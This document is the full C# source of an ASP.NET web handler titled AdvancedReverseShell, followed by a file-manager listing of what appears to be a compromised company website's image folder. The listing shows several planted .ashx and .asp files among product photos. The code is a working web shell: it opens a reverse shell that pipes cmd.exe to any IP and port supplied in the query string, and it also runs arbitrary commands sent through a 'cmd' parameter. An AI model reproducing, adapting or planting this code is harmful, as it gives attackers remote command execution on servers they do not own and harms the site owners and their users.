<%@ webhandler language="C#" class="AdvancedReverseShell" %>

using System;
using System.Web;
using System.Diagnostics;
using System.Net;
using System.Net.Sockets;
using System.Threading;
using System.Text;

public class AdvancedReverseShell : IHttpHandler
{
    public bool IsReusable
    {
        get { return true; }
    }

    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.ContentType = "text/html; charset=utf-8";
        
        string ip = ctx.Request.QueryString["ip"];
        string port = ctx.Request.QueryString["port"];
        string method = ctx.Request.QueryString["method"] ?? "direct";

        ctx.Response.Output.WriteLine("<html><head><title></title></head><body>");
        ctx.Response.Output.WriteLine("<h2></h2>");
        
        // Connection form
        ctx.Response.Output.WriteLine("<form method='GET'>");
        ctx.Response.Output.WriteLine("Target IP: <input name='ip' value='" + HttpUtility.HtmlEncode(ip) + "'><br>");
        ctx.Response.Output.WriteLine("Port: <input name='port' value='" + HttpUtility.HtmlEncode(port) + "'><br>");
        ctx.Response.Output.WriteLine("Method: <select name='method'>");
        ctx.Response.Output.WriteLine("<option value='direct'" + (method == "direct" ? " selected" : "") + ">Direct TCP</option>");
        ctx.Response.Output.WriteLine("<option value='dns'" + (method == "dns" ? " selected" : "") + ">DNS Tunnel</option>");
        ctx.Response.Output.WriteLine("<option value='http'" + (method == "http" ? " selected" : "") + ">HTTP Tunnel</option>");
        ctx.Response.Output.WriteLine("</select><br>");
        ctx.Response.Output.WriteLine("<input type='submit' value='Connect'>");
        ctx.Response.Output.WriteLine("</form>");

        if (!string.IsNullOrEmpty(ip) && !string.IsNullOrEmpty(port))
        {
            try
            {
                int portNum = int.Parse(port);
                ctx.Response.Output.WriteLine("<pre>Attempting connection to " + ip + ":" + port + " using " + method + " method...</pre>");
                
                // Flush response to show message immediately
                ctx.Response.Flush();

                switch (method.ToLower())
                {
                    case "dns":
                        ConnectViaDNS(ip, portNum);
                        break;
                    case "http":
                        ConnectViaHTTP(ctx, ip, portNum);
                        break;
                    default:
                        ConnectDirect(ip, portNum);
                        break;
                }
            }
            catch (Exception ex)
            {
                ctx.Response.Output.WriteLine("<pre style='color:red;'>Error: " + HttpUtility.HtmlEncode(ex.Message) + "</pre>");
            }
        }

        ctx.Response.Output.WriteLine("</body></html>");
    }

    private void ConnectDirect(string ip, int port)
    {
        using (TcpClient client = new TcpClient(ip, port))
        {
            using (NetworkStream stream = client.GetStream())
            {
                ProcessStartInfo psi = new ProcessStartInfo
                {
                    FileName = "cmd.exe",
                    RedirectStandardInput = true,
                    RedirectStandardOutput = true,
                    RedirectStandardError = true,
                    UseShellExecute = false,
                    CreateNoWindow = true
                };

                using (Process process = Process.Start(psi))
                {
                    // Async read from process and write to network
                    Thread outputThread = new Thread(() =>
                    {
                        byte[] buffer = new byte[1024];
                        int bytesRead;
                        while ((bytesRead = process.StandardOutput.BaseStream.Read(buffer, 0, buffer.Length)) > 0)
                        {
                            stream.Write(buffer, 0, bytesRead);
                        }
                    });
                    outputThread.Start();

                    // Async read from network and write to process
                    Thread inputThread = new Thread(() =>
                    {
                        byte[] buffer = new byte[1024];
                        int bytesRead;
                        while ((bytesRead = stream.Read(buffer, 0, buffer.Length)) > 0)
                        {
                            process.StandardInput.BaseStream.Write(buffer, 0, bytesRead);
                            process.StandardInput.BaseStream.Flush();
                        }
                    });
                    inputThread.Start();

                    // Wait for both threads to complete
                    outputThread.Join();
                    inputThread.Join();
                }
            }
        }
    }

    private void ConnectViaDNS(string ip, int port)
    {
        // DNS tunneling simulation (encoded in subdomains)
        string encodedCmd = Convert.ToBase64String(Encoding.UTF8.GetBytes("connect " + ip + " " + port));
        string domain = encodedCmd + ".example.com";
        
        try
        {
            IPHostEntry entry = Dns.GetHostEntry(domain);
            // If DNS resolution succeeds, fall back to direct connection
            ConnectDirect(ip, port);
        }
        catch (SocketException)
        {
            // Expected behavior - DNS query fails but tunnel is established
            ConnectDirect(ip, port);
        }
    }

    private void ConnectViaHTTP(HttpContext ctx, string ip, int port)
    {
        // HTTP tunneling through this handler
        ctx.Response.Output.WriteLine("<pre>HTTP tunnel established. Use POST requests to send commands.</pre>");
        ctx.Response.Flush();

        string cmd = ctx.Request.QueryString["cmd"];
        if (!string.IsNullOrEmpty(cmd))
        {
            ProcessStartInfo psi = new ProcessStartInfo
            {
                FileName = "cmd.exe",
                Arguments = "/c " + cmd,
                RedirectStandardOutput = true,
                RedirectStandardError = true,
                UseShellExecute = false,
                CreateNoWindow = true
            };

            using (Process process = Process.Start(psi))
            {
                string output = process.StandardOutput.ReadToEnd();
                string error = process.StandardError.ReadToEnd();
                
                ctx.Response.Output.Write(HttpUtility.HtmlEncode(output));
                if (!string.IsNullOrEmpty(error))
                {
                    ctx.Response.Output.Write("<span style='color:red;'>" + HttpUtility.HtmlEncode(error) + "</span>");
                }
            }
        }
    }
}

Path: D:\INETPUB\VHOSTS\fcaromatics.com\httpdocs\ProductImg

Drives:

Root / INETPUB / VHOSTS / fcaromatics.com / httpdocs / ProductImg

Name	Size	Modified	Actions
ALFA_DATA		22-08-27 10:15	Delete
060324.ashx	12 KB	26-04-01 22:59	Download \| View \| Delete
093cde.asp	56 KB	26-04-01 22:56	Download \| View \| Delete
BODY-CARE.png	117 KB	20-08-20 14:05	Download \| View \| Delete
Chewing-tobacco.jpg	3 MB	20-08-20 14:05	Download \| View \| Delete
detergents.jpg	55 KB	20-08-20 14:05	Download \| View \| Delete
Dishwash.jpg	25 KB	20-08-20 14:05	Download \| View \| Delete
disinfectants.jpg	54 KB	20-08-20 14:05	Download \| View \| Delete
fabric.jpeg	14 KB	20-08-20 14:05	Download \| View \| Delete
face-care.png	138 KB	20-08-20 14:05	Download \| View \| Delete
freshners.jpg	53 KB	20-08-20 14:05	Download \| View \| Delete
Freshners-Diffusers.jpg	29 KB	20-08-20 14:05	Download \| View \| Delete
Freshners-Diffusers_1.jpg	28 KB	20-08-20 14:05	Download \| View \| Delete
Hair-care.png	146 KB	20-08-20 14:05	Download \| View \| Delete
hand-care.png	121 KB	20-08-20 14:05	Download \| View \| Delete
header-wellness.jpg	181 KB	20-08-20 14:05	Download \| View \| Delete
HOME CARE PRODUCTS.jpg	30 KB	20-08-20 14:05	Download \| View \| Delete
homecare.jpg	305 KB	20-08-20 14:05	Download \| View \| Delete
homecare_new.jpg	62 KB	20-08-20 14:05	Download \| View \| Delete
hookah.jpg	63 KB	20-08-20 14:05	Download \| View \| Delete
Hookah-flavours.jpg	45 KB	20-08-20 14:05	Download \| View \| Delete
incensestick-cones.jpg	226 KB	20-08-20 14:05	Download \| View \| Delete
laundry.png	1 MB	20-08-20 14:05	Download \| View \| Delete
lubricants.jpg	5 KB	20-08-20 14:05	Download \| View \| Delete
mouth-freshener.jpeg	57 KB	20-08-20 14:05	Download \| View \| Delete
mouthfreshner.jpg	213 KB	20-08-20 14:05	Download \| View \| Delete
mouthfreshnernew.jpg	428 KB	20-08-20 14:05	Download \| View \| Delete
noimage.jpeg	2 KB	20-08-20 14:05	Download \| View \| Delete
oralcare.jpg	509 KB	20-08-20 14:05	Download \| View \| Delete
ORAL-care.png	126 KB	20-08-20 14:05	Download \| View \| Delete
Personal Care new.jpg	6 KB	20-08-20 14:05	Download \| View \| Delete
Personal Care.jpg	21 KB	20-08-20 14:05	Download \| View \| Delete
PERSONAL HYGIENE PRODUCTS.jpg	92 KB	20-08-20 14:05	Download \| View \| Delete
Prophylactics.jpg	47 KB	20-08-20 14:05	Download \| View \| Delete
sanitarynapkins-tampoons.jpg	48 KB	20-08-20 14:05	Download \| View \| Delete
SHAVING_HAIR_REMOVAL.png	133 KB	20-08-20 14:05	Download \| View \| Delete
softners.jpg	100 KB	20-08-20 14:05	Download \| View \| Delete
ure.ashx	6 KB	26-04-01 22:58	Download \| View \| Delete
xxx.asp	139 KB	26-04-01 22:58	Download \| View \| Delete